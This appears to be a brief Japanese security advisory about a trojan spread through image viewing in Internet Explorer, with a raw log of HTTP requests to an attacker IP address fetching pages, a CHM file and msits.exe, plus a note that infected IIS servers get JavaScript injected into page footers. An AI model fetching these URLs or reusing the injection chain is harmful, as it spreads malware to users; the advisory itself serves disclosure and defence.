■危険度・緊急度

☆★★★★

■インパクト

トロイの木馬型ウィルス

■概要

IEでの画像閲覧により、ファイルをダウンロードし実行させられる。

GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147//main.chm
GET _http_://217.107.218.147/msits.exe
GET _http_://217.107.218.147/redir.php

GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/md.htm
GET _http_://217.107.218.147/redir.php
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/dot.php
GET _http_://217.107.218.147/new.html
GET _http_://217.107.218.147/md.htm
GET _http_://217.107.218.147/redir.php

IISを実行しているWindows2000の場合、ページのフッターにJavaScriptが埋め込まれてしまう。
それを閲覧したIEでさらに被害拡大していく。